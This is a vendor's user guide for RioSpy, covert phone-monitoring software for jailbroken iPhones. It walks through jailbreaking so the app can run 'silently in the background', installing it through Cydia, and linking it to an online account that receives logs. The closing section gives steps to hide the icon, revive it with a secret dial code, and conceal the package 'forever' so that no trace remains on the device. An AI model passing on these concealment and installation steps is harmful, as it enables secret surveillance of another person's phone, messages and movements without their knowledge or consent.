RioSpy User Guide for iPhone

Installation for iPhone Devices

Welcome to the installation page for your iPhone. RioSpy is ONLY

compatible with ANY jailbroken iPhone 3G, 3GS, 4, 4S, iPhone 5, iPad at least

3.1.3 firmware and above. You need Cydia application to install RioSpy. This guide

assumes you have already opened an account on www.riospy.com.

IMPORTANT NOTE: It is recommended you do a backup of your phone in

iTunes before proceeding with the steps. The steps will not cause you to lose any

music, pictures, apps, settings, etc. We DO NOT provide support with jailbreaking

the iPhone, but can recommend useful sites to obtain information on the

jailbreaking process.

There are 3 different groups of steps you must perform. These groups of

steps are listed below:

1. Jaibreak your iPhone which install Cydia at the same time.

2. Install RioSpy using Cydia.

3. Login and configuring the parameters for RioSpy.

1. Jailbreak your phone which installs Cydia

What is Jailbreaking & Why do I need it?

The application RioSpy needs to run silently in the background. It's

necessary to jailbreak your iPhone so you can run the silent application in the

background.

Jailbreaking your phone install automatic Cydia. There is no cost to

jailbreaking your iPhone and it is completely reversible if the need should ever

arise.

How to Jailbreak your iPhone

You can decide on which method you want to use. Again, we DO NOT

provide support or instructions on how to jailbreak your iPhone.

2. Install RioSpy using Cydia

Attention: Check before if you have an Internet access by Wi-Fi or 3G

with your iPhone. After that we can start to install RioSpy program with

Cydia.

Find Cydia

Search on the springboard of

your iPhone the icon of Cydia.

Tap with your finger on the icon

Cydia to run the application.

Agree to any requests from

Cydia. If it asks you to choose

"Developer, User, or Hacker"

please choose "User". Then

Cydia will restart to reflect

those changes. If Cydia asks

you to download any updates,

please do so.

1. Tap Manage on the main

screen of Cydia.

2. Then tap the Sources box.

3. On this screen tap Edit button

4. Then tap the Add button.

5. In the Add Sources pop-up

box, type

tap on button Add Source.

6. Tap Return To Cydia button.

7. Now tap the iphone.riospy.com

to view detail.

8. Now tap on the RioSpy entry

9. Then tap the Install button to

install RioSpy

10.On this screen, tap the button

Confirm.

11.Wait until Cydia finished to

install the application RioSpy in

your iPhone. When this screen

appears, press the Restart

Springboard.

The installation of RioSpy in your

iPhone is finished.

3. Sign up an online account and Register your iPhone

Check before if you have an Internet access by Wi-Fi or 3G with your

iPhone.

1. On springboard tap on the RioSpy icon to bring up the interface.

2. If you don't have an account on website RioSpy yet, tap Register to

create account. Insert email address, password you wish. Click Create

account.

Attention:

When you create an account, your device will be registered to this account

automatically. You should use a valid email address to create account because later you will

used this account to view logs result, recover password if you ever forget, receive link

download CSV back up data…

3. If you have an account in website www.riospy.com already, tap Login to

register device to your account. Insert email address, password of your

account. Click Login.

If you cannot log in:

- Check if you have an internet connection in your iPhone.

- Check again your email address and password and send again.

- Log in your account on web site www.riospy.com to verify your

account is already created and valid.

4. Hide RioSpy in iPhone Springboard, Cydia and Hide

i. Tap Hide Icon From Springboard button to hide icon RioSpy.

Icon RioSpy will be hidden in Springboard but still be showed in Packages of

Cydia. To show icon RioSpy again, dial #999*.

ii. Tap Hide Package Forever button to hide RioSpy on iPhone forever.

From now on, RioSpy will begin to works on your iPhone in steath mode. There

is no sight, no trace of RioSpy in your iPhone, even in Cydia and no one, include

you, can open RioSpy interface again. Don’t worry, you still can adjust setting via

website by log in to your security account.
